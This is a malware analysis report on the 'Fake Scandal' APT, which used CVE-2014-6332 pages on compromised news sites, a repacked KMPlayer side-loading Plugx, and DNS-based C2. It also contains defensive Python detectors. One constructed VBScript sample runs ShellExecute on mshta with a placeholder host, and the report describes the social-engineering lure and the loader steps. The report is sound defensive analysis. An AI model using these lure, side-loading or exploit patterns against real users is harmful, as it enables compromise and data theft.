fake scandal - cognytecyber.verint.com/.../2016/05/maleware_fake-scandal-1.pdf · 2019. 7. 27. ·...

Malware Report | November 2014

Fake Scandal: GOD MODE SPREADS THE NEW PLUGX BACKDOOR


TABLE OF CONTENTS

Fake Scandal
Actionable Intelligence to Prevent Future Attacks
Background: Using God Mode to Enable Remote Code Execution
Innovative Attack Vectors
Technical Analysis
Exploit CVE-2014-6332 to Install Plugx Malware
Repacked KMPlayer with Embedded Plugx Malware
Malware Analysis: Abusing DNS Protocol as a Covert Channel
Actionable Intelligence
Related MD5 Hashes
Intelligent Solutions Are Required to Combat Today's Hyper-Sophisticated APTs
References

Unauthorized use, duplication, or modification of this document in whole or in part without the written consent of Verint Systems Inc. is strictly prohibited.By providing this document, Verint Systems Inc. is not making any representations regarding the correctness or completeness of its contents and reserves the right to alter this document at any time without notice.Features listed in this document are subject to change. Please contact Verint for current product features and specifications.All marks referenced herein with the ® or TM symbol are registered trademarks or trademarks of Verint Systems Inc. or its subsidiaries. All rights reserved. All other marks are trademarks of their respective owners.© 2014 Verint Systems Inc. All rights reserved worldwide.


FAKE SCANDAL

The Verint research team discovered a dangerous APT, nicknamed Fake Scandal, that combined several innovative techniques, some of which had not previously been reported in the wild.

The attackers compromised two news sites (one in Hong Kong and one in Taiwan) and planted fabricated scandal stories to host their exploit code. In addition to conventional spear-phishing emails, they lured company employees into opening the malicious link by chatting with the company's online help desk.

The crafted webpage carries exploit code for CVE-2014-6332 (Microsoft bulletin MS14-064). The exploit corrupts memory to disable Internet Explorer's SafeMode flag, enabling what is known as God Mode: the script can then create objects that zone checking would otherwise refuse and run arbitrary programs without any shellcode. Even where the lured target's Windows was already patched, the page instructed the visitor to download the KMPlayer video software, which had been repacked with embedded Plugx malware. In both cases the planted malware uses the DNS protocol as a covert channel for its C2 communications.

Actionable Intelligence to Prevent Future Attacks

Verint provides Actionable Intelligence in the form of MD5 hashes that enable organizations to identify the files used in this attack and prevent advanced APTs from exploiting this vulnerability to gain control of user machines.

At the time of writing, this multi-stage APT had not been reported by other security vendors. Verint's detection is the first report of an APT in which the attackers interacted directly with employees online, and the first known instance of the Plugx RAT using DNS queries for C2 communications.

BACKGROUND: USING GOD MODE TO ENABLE REMOTE CODE EXECUTION

CVE-2014-6332 was among the security updates in Microsoft's Patch Tuesday release (the regular patch release on the second Tuesday of each month) of November 11, 2014. This vulnerability, also known as the Windows OLE Automation Array Remote Code Execution Vulnerability, captured the attention of the security community for good reason: it affects every version of Internet Explorer from version 3 (1996) to version 11 (2013) and allows remote attackers to execute arbitrary code via a crafted website. The bug is caused by improper handling of a size value in the OLE SafeArray redimension function, which gives an attacker arbitrary read and write access within the address space of the browser process.

The arbitrary read/write by itself does not directly yield code execution; instead, attackers use it to disable Internet Explorer's SafeMode flag. This technique, often referred to as God Mode, was discovered by the Chinese researchers Yang Yu (tombkeeper) [1] and Yuange [2]. Once in God Mode, the script can bypass Internet Explorer's zone checking and create otherwise forbidden objects, such as a shell object, so the attacker can run any program without shellcode. By combining these two tricks (turning off SafeMode and bypassing zone checking), the attack sidesteps the usual memory-corruption mitigations such as EMET, ASLR and DEP, because no control-flow hijack is ever needed.

INNOVATIVE ATTACK VECTORS

Targeted attacks typically use email or web links as the vector for delivering malware to a victim's machine. These simple social-engineering techniques let attackers reach their victims by enticing them to open spoofed emails (phishing) or to click on malicious links.

This operation, however, reveals a far more sophisticated and resourceful method. First, the attackers compromised an official news website and crafted scandal-related news items about various companies. Next, they embedded the CVE-2014-6332 exploit code in these fake news pages and lured a targeted company employee into viewing the page. Verint discovered the malicious code through static file analysis of the web traffic payload.

Then, to maximize clicks on the link to the fake news site and to evade anti-APT email appliances, the attackers distributed the link not only through email but also via online help-desk chat services. The following is a real conversation log extracted from such a help-desk service.

Conversation log from help desk:

[GUEST] 2014-11-13 15:50:11 say: Hello
[Services Helper Num.501] 2014-11-13 15:50:50 say: Hello
[GUEST] 2014-11-13 15:51:19 say: I'm Hong Kong HNN news editor.
[Services Helper Num.501] 2014-11-13 15:51:32 say: Yes, may I help you?
[GUEST] 2014-11-13 15:51:32 say: Would you please tell me your chief's mail address?
[GUEST] 2014-11-13 15:51:36 say: http://news.hnn.hk/2014/0729/private_newstw.php We have received the news about your employee's bribery scandal but right now I cannot contact your chief to confirm this. Please visit this link as soon as possible.

[1] http://threatpost.com/microsoft-pays-out-another-100000-mitigation-bypass-bounty/104291
[2] http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b

Verint's discovery is the first reported APT in which the attackers not only sent the malicious link by email but were also observed actively chatting with employees online to convince them to click on it.

Fake scandal news page (the compromised HNN news site is used to publish the fabricated story)


The help-desk dialog links to what looks like a normal news page with the Chinese title "[breaking news] The Hong Kong tourists are extorted by customs staff while immigrating into Taiwan." The page also tells visitors to download KMPlayer if the video does not play correctly.

Analysis of this page shows that the attackers used two methods of attack. First, the page contains CVE-2014-6332 exploit code modified from Yuange1975's proof-of-concept (PoC) code. The exploit uses the OLE array-resizing vulnerability to disable Internet Explorer's SafeMode flag in memory and then escapes zone checking when creating any object. Second, the page tricks users into downloading Portable KMPlayer to play the video; if a user clicks the download link, the repacked KMPlayer is served from the HNN news site.

TECHNICAL ANALYSIS

Exploit CVE-2014-6332 to Install Plugx Malware

The first stage of the attack silently installs the Plugx malware:

• When users browse the page in Internet Explorer, it triggers the vulnerability and launches a second web page (www.twnewsdaily.com/home/old_no/pay.html) via mshta.exe.

• pay.html is responsible for downloading and executing the "apple.jpg" file, which is in reality a Plugx malware executable.

twnewsdaily.com is also used for injecting the malware (apple.jpg) into victims' computers
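The report says the exploit page was found by static analysis of the web traffic payload. The following Python scanner is an added example, not Verint's detection logic and not the exploit itself: it scores a captured page against indicators that reflect the publicly known shape of the Yuange1975 VBScript PoC (the SafeArray ReDim Preserve trigger, the Shell.Application object that script can only create once SafeMode is off, ShellExecute, and the mshta.exe hand-off described in the first stage above) and extracts the URLs an analyst would block. The indicator weights, the verdict threshold and the two sample pages (including the placeholder host example.invalid) are constructed assumptions.

```python
"""Static indicator scan for the CVE-2014-6332 "God Mode" VBScript pattern.

Added example, not Verint's detection logic and not the exploit. Indicators
follow the publicly known shape of the Yuange1975 proof of concept the report
says the page was modified from; weights and threshold are illustrative
assumptions, not a vendor signature. Sample pages are constructed.
"""
import re
from dataclasses import dataclass, field

VERDICT_THRESHOLD = 6  # assumption: weight sum that makes a page "exploit-like"

# (indicator name, pattern, weight)
INDICATORS = [
    ("vbscript_block", re.compile(r"<script[^>]*\bvbscript\b", re.I), 1),
    ("on_error_resume_next", re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I), 1),
    # ReDim Preserve on a SafeArray is what triggers the OLE resize bug.
    ("redim_preserve", re.compile(r"\bReDim\s+Preserve\b", re.I), 3),
    # Shell objects that script can only create once SafeMode is cleared.
    ("unsafe_com_object", re.compile(
        r"CreateObject\s*\(\s*[\"'](?:Shell\.Application|WScript\.Shell)[\"']", re.I), 3),
    ("shell_execute", re.compile(r"\bShellExecute\b", re.I), 2),
    # The report's first stage hands a second page to mshta.exe.
    ("mshta", re.compile(r"\bmshta(?:\.exe)?\b", re.I), 2),
    # Type probing of the corrupted array, as in the public PoC.
    ("vartype_probe", re.compile(r"\bVarType\s*\(", re.I), 1),
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        return "exploit-like" if self.score >= VERDICT_THRESHOLD else "no-match"


def scan_page(html: str) -> ScanResult:
    """Score one captured page. URLs are extracted only from flagged pages so
    the analyst gets the second-stage location (the report's pay.html)."""
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            result.score += weight
            result.hits.append(name)
    if result.verdict == "exploit-like":
        result.urls = sorted(set(URL_RE.findall(html)))
    return result


# Constructed stand-in for the weaponised news page: it has the PoC's shape
# but no working memory corruption. example.invalid is a placeholder host.
EXPLOIT_LIKE_PAGE = """
<html><body>
<script language="VBScript">
On Error Resume Next
Dim aa()
ReDim Preserve aa(5)
If VarType(aa(1)) <> 0 Then
  Set sh = CreateObject("Shell.Application")
  sh.ShellExecute "mshta", "http://www.example.invalid/pay.html", "", "open", 0
End If
</script>
</body></html>
"""

# Constructed benign page: VBScript plus On Error alone is not enough.
BENIGN_PAGE = """
<html><body>
<script language="VBScript">
On Error Resume Next
document.write("hello")
</script>
</body></html>
"""

if __name__ == "__main__":
    for label, page in (("exploit-like sample", EXPLOIT_LIKE_PAGE),
                        ("benign sample", BENIGN_PAGE)):
        r = scan_page(page)
        print(f"{label}: {r.verdict} score={r.score} hits={r.hits} urls={r.urls}")
```

Real exploit pages usually hide these strings behind Chr() concatenation or string reversal, so the scanner should run on the de-obfuscated script text (or treat the obfuscation primitives themselves as indicators). On the endpoint, the matching process-telemetry signal for this stage is mshta.exe started as a child of iexplore.exe.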


When browsing the page, the vulnerability is triggered to install a Plugx RAT

Repacked KMPlayer with Embedded Plugx Malware

In the second stage of the attack, the attackers trick users into downloading a modified, malicious KMPlayer:

• If users follow the download instructions, they receive a portable KMPlayer.zip file from the HNN news site.

• Analysis of this KMPlayer.zip shows that it differs from the package distributed on the official KMPlayer site.


Earth.ksf, Moon.ksf and apphelp.dll were added to the KMPlayer.zip

Plugx RAT Installation Flow

• The attackers placed "apphelp.dll" in the root directory of the package. When the signed KMPlayer.exe starts, the Windows loader resolves apphelp.dll from the application directory before System32, so the planted DLL is loaded first. This technique, DLL search-order hijacking (also called DLL side-loading), is a common way to load Plugx.

• The fake apphelp.dll performs the following jobs:

1. Load Skins\Moon.ksf (encrypted shellcode), decrypt it with the key "aRYcQ0dM", and create a thread to run the decrypted shellcode.

2. Move Skins\Earth.ksf (the real Plugx malware) to %TEMP%\KMPsetup.exe and execute it. Earth.ksf is a Plugx DLL search-order hijacking package containing three files:

> FSPMAPI.dll is a loader that decrypts FSPMAPI.dll.fsp and runs the resulting shellcode. The DLL also checks that the system date is later than 2014-06-06 before proceeding.

> FSPMAPI.dll.fsp is the encrypted main body of Plugx.

> fsstm.exe is a legitimate program from F-Secure Anti-Virus, abused as the host executable that loads the attacker's FSPMAPI.dll through the same search-order hijack.

3. Delete Skins\Moon.ksf and move apphelp.dll to %TEMP%\~hotfix12887.tmp.
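The installation flow above rests on three observable facts: the archive contains files the genuine package does not, one of them is a DLL with a System32 name dropped next to the signed EXE, and every file has a known hash. The following Python audit is an added example, not Verint's tooling; it applies those three checks to a zip archive. The report's MD5 list (from the Related MD5 Hashes section) is the default IOC set, while the reference manifest, the subset of side-loadable System32 DLL names and the sample archive contents are constructed for illustration.

```python
"""Audit a downloaded archive for the side-loading layout the report describes.

Added example, not Verint's tooling. Flags (1) the archive or any entry whose
MD5 matches an IOC list, defaulting to the report's hashes; (2) a DLL in the
archive root, beside an EXE, whose name the loader would otherwise resolve
from System32 (DLL search-order hijack, as with the fake apphelp.dll); and
(3) entries absent from a reference manifest of the genuine package. Manifest,
System32 name subset and sample archive are constructed.
"""
import hashlib
import io
import zipfile
from dataclasses import dataclass

# MD5 IOCs from the report. apple.jpg/Earth.ksf and apphelp.dll/~hotfix12887.tmp
# share hashes because each pair is the same file under two names.
REPORT_MD5 = {
    "f8f051b688e9ea194650e8b7482b4773": "apple.jpg / Earth.ksf",
    "67a46fef41d7db7974db64ae15a6532f": "KMplayer.zip",
    "0d0a7540494f1319ca3ce8e58ee2b254": "apphelp.dll / ~hotfix12887.tmp",
    "b912bbdfa58fb1aab886f4f0b191625e": "FSPMAPI.dll",
    "9ef895b5892f6f1f917291812c110b31": "FSPMAPI.dll.fsp",
    "3a9cd20f84be1c919a6c8fb263e00a95": "fsstm.exe",
}

# DLL names that are not KnownDLLs and so are resolved from the application
# directory before System32. Illustrative subset (an assumption), not a full list.
SHADOWABLE_DLLS = {"apphelp.dll", "version.dll", "dwmapi.dll",
                   "uxtheme.dll", "propsys.dll", "cryptbase.dll"}


@dataclass(frozen=True)
class Finding:
    kind: str   # archive-ioc | file-ioc | sideload-candidate | unexpected-file
    name: str
    detail: str


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def audit_archive(zip_bytes: bytes, manifest: set,
                  ioc: dict = REPORT_MD5, shadowable: set = SHADOWABLE_DLLS) -> list:
    findings = []
    archive_md5 = md5_hex(zip_bytes)
    if archive_md5 in ioc:
        findings.append(Finding("archive-ioc", "<archive>", ioc[archive_md5]))
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        entries = [i for i in zf.infolist() if not i.is_dir()]
        root_has_exe = any("/" not in i.filename and i.filename.lower().endswith(".exe")
                           for i in entries)
        for info in entries:
            name = info.filename
            digest = md5_hex(zf.read(name))
            if digest in ioc:
                findings.append(Finding("file-ioc", name, ioc[digest]))
            if name not in manifest:
                findings.append(Finding("unexpected-file", name, f"md5={digest}"))
            # Search-order hijack candidate: System32 DLL name beside an EXE in root.
            if "/" not in name and root_has_exe and name.lower() in shadowable:
                findings.append(Finding("sideload-candidate", name,
                                        "System32 DLL name beside an EXE in archive root"))
    return findings


# Constructed stand-in for the repacked KMPlayer.zip: a genuine-looking EXE and
# skin plus the three files the report says were added. Contents are dummies.
SAMPLE_FILES = {
    "KMPlayer.exe": b"MZ-dummy-signed-player",
    "Skins/Default.ksf": b"genuine skin data",
    "apphelp.dll": b"MZ-dummy-fake-apphelp",
    "Skins/Moon.ksf": b"encrypted-shellcode-stand-in",
    "Skins/Earth.ksf": b"plugx-package-stand-in",
}
GENUINE_MANIFEST = {"KMPlayer.exe", "Skins/Default.ksf"}


def build_sample_zip(files: dict = SAMPLE_FILES) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    for f in audit_archive(build_sample_zip(), GENUINE_MANIFEST):
        print(f"{f.kind:20} {f.name:20} {f.detail}")
```

The manifest check is the one that generalises: a package-specific DLL such as FSPMAPI.dll inside Earth.ksf carries no System32 name, so only a comparison against the vendor's genuine file list catches it. Hash matching only finds the exact samples from this campaign; a recompiled loader needs the structural checks.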


Malware Analysis: Abusing DNS Protocol as a Covert Channel

In this attack, the communication methods of the Plugx RAT were changed significantly to mask its traffic: the sample carries its C2 communications inside DNS queries. This finding marks the first report of the Plugx RAT using the DNS query protocol for C2 communications.

Communication with C2 through DNS protocol
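The report does not describe how this Plugx variant encodes data in its DNS queries, so the following Python example is an added generic DNS tunnelling detector rather than a Plugx-specific signature, and not Verint's code. It aggregates a resolver query log per registered domain and flags domains that receive many unique, long, high-entropy subdomain labels, which any DNS covert channel must produce whatever its encoding; this is also the kind of DNS query monitoring the Actionable Intelligence section recommends. The log format, the thresholds and the sample lines (using .test domains) are constructed assumptions.

```python
"""Heuristic DNS covert-channel detection over resolver query logs.

Added example, not Verint's detection and not Plugx's actual encoding (the
report does not describe it). Any DNS tunnel must push its payload into query
names, so the features are generic: unique names per registered domain,
longest label, entropy of the leftmost label and use of TXT records.
Log format, thresholds and sample lines are constructed assumptions.
"""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed resolver log: "<epoch> <client> <qtype> <qname>". The
# example-c2.test lines imitate a tunnel (each query carries a 32-character
# hex label); av-vendor.test imitates a benign one-off hash lookup.
SAMPLE_LOG = """\
1415862000 10.0.0.5 A    www.example.com
1415862001 10.0.0.5 A    mail.example.com
1415862002 10.0.0.5 A    cdn.example.com
1415862003 10.0.0.5 A    api.example.com
1415862004 10.0.0.5 A    static.example.com
1415862005 10.0.0.7 TXT  0123456789abcdef0123456789abcdef.upd.example-c2.test
1415862006 10.0.0.7 A    3456789abcdef0123456789abcdef012.upd.example-c2.test
1415862007 10.0.0.7 TXT  6789abcdef0123456789abcdef012345.upd.example-c2.test
1415862008 10.0.0.7 A    9abcdef0123456789abcdef012345678.upd.example-c2.test
1415862009 10.0.0.7 TXT  cdef0123456789abcdef0123456789ab.upd.example-c2.test
1415862010 10.0.0.7 A    f0123456789abcdef0123456789abcde.upd.example-c2.test
1415862011 10.0.0.5 A    0123456789abcdef0123456789abcdef.lookup.av-vendor.test
"""


@dataclass
class DomainStats:
    queries: int = 0
    txt_queries: int = 0
    names: set = field(default_factory=set)
    max_label_len: int = 0
    entropy_sum: float = 0.0

    @property
    def mean_entropy(self) -> float:
        return self.entropy_sum / self.queries if self.queries else 0.0


def shannon_entropy(text: str) -> float:
    """Bits per character; a label using all 16 hex digits twice gives 4.0."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registered_domain(qname: str) -> str:
    """Last two labels. A real deployment should consult the public suffix
    list (co.uk etc.); the simplification is deliberate for the example."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def analyze_log(log_text: str) -> dict:
    stats = defaultdict(DomainStats)
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        _ts, _client, qtype, qname = line.split()
        labels = qname.rstrip(".").lower().split(".")
        st = stats[registered_domain(qname)]
        st.queries += 1
        if qtype.upper() == "TXT":
            st.txt_queries += 1
        st.names.add(".".join(labels))
        st.max_label_len = max(st.max_label_len, max(len(lbl) for lbl in labels))
        # The leftmost label is where a tunnel carries its payload.
        st.entropy_sum += shannon_entropy(labels[0])
    return dict(stats)


def flagged_domains(stats: dict, min_names: int = 5, min_label_len: int = 20,
                    min_entropy: float = 3.0) -> list:
    """Thresholds are assumptions; tune them against your own baseline.
    Requiring many distinct names keeps single hash lookups (AV, CDN) quiet."""
    return sorted(
        domain for domain, st in stats.items()
        if len(st.names) >= min_names
        and st.max_label_len >= min_label_len
        and st.mean_entropy >= min_entropy
    )


if __name__ == "__main__":
    stats = analyze_log(SAMPLE_LOG)
    for domain in flagged_domains(stats):
        st = stats[domain]
        print(f"{domain}: {st.queries} queries, {len(st.names)} names, "
              f"max label {st.max_label_len}, mean entropy {st.mean_entropy:.2f}, "
              f"TXT {st.txt_queries}")
```

Entropy alone would also fire on legitimate services that encode hashes in hostnames (antivirus reputation lookups, some CDNs), which is why the rule requires a sustained stream of distinct names under one registered domain and why such domains belong on an allowlist. The C2 responses travel in the answer section, so capturing responses as well as queries (and the resolver the client used) is needed before blocking.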


Verint TPS applies Dynamic Analysis to identify the malware executable file

Automated behavioral scan of the new Plugx RAT (figure not reproduced in this transcript)


ACTIONABLE INTELLIGENCE

Verint recommends that organizations take the following countermeasures to protect users against the CVE-2014-6332 vulnerability:

• Apply the MS14-064 patch to all Windows hosts as soon as possible. The flaw sits in the OLE automation component reached through Internet Explorer, so user workstations are the primary target, not only servers.

• Block the C2 domains and monitor DNS query traffic for tunnelling patterns (large numbers of unique subdomains under one domain, long high-entropy labels, unusual TXT query volume).

• Enable Protected Mode in Internet Explorer.

Note that patching closes only the first stage: a user who follows the page's instructions and runs the repacked KMPlayer still installs Plugx, so the download should also be blocked by hash (see the list below) and users warned not to install software offered by a news page.

Related MD5 Hashes

F8F051B688E9EA194650E8B7482B4773  apple.jpg
67A46FEF41D7DB7974DB64AE15A6532F  KMplayer.zip
0D0A7540494F1319CA3CE8E58EE2B254  ~hotfix12887.tmp
0D0A7540494F1319CA3CE8E58EE2B254  apphelp.dll
F8F051B688E9EA194650E8B7482B4773  Earth.ksf
B912BBDFA58FB1AAB886F4F0B191625E  FSPMAPI.dll
9EF895B5892F6F1F917291812C110B31  FSPMAPI.dll.fsp
3A9CD20F84BE1C919A6C8FB263E00A95  fsstm.exe

apple.jpg and Earth.ksf share a hash, as do apphelp.dll and ~hotfix12887.tmp: each pair is the same file under two names, matching the installation flow described above.

Intelligent Solutions Are Required to Combat Today's Hyper-Sophisticated APTs

This is a real-world case of an APT attack discovered by Verint. The attackers compromised two news sites (one in Hong Kong and one in Taiwan) and created a fake scandal story as bait to entice company employees to click on the malicious links. Beyond spoofed emails, they also interacted with their victims through an online help desk. It is clear that attackers will make every effort to take advantage of this vulnerability, using a variety of creative and innovative methods, to penetrate a company's security perimeter.

References

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332
https://technet.microsoft.com/library/security/ms14-064
http://deepflash.blogspot.com/2014/11/ie-safemode-bypass.html


About Verint Systems Inc.Verint® (Nasdaq: VRNT) is a global leader in Actionable Intelligence® solutions with a focus on customer engagement optimization, security intelligence, and fraud, risk and compliance. Today, more than 10,000 organizations in 180 countries — including over 80 percent of the Fortune 100 — count on intelligence from Verint solutions to make more informed, effective and timely decisions.

www.verint.com/cyber | Info.cyber@verint.com